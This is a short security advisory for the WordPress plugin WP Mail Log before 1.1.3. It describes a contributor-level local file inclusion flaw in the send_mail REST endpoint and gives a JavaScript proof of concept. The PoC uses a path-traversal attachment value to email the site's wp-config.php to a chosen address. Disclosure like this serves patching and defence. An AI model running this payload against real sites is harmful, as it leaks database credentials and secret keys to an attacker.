WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint

Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files.

PoC

Run the following within any page on the site, ensuring that the id parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site’s wp-config.php file as an attachment. var nonce = await (await fetch(‘/wp-admin/admin-ajax.php?action=rest-nonce’)).text(); await (await fetch(‘/wp-json/wml/v1/wml_logs/send_mail’, {method: ‘POST’, headers: {‘Content-Type’: ‘application/x-www-form-urlencoded’, ‘X-WP-Nonce’: nonce}, body: ‘id=1&to;[email protected]&includeAttachment;={“…/…/wp-config.php”:1}’})).text();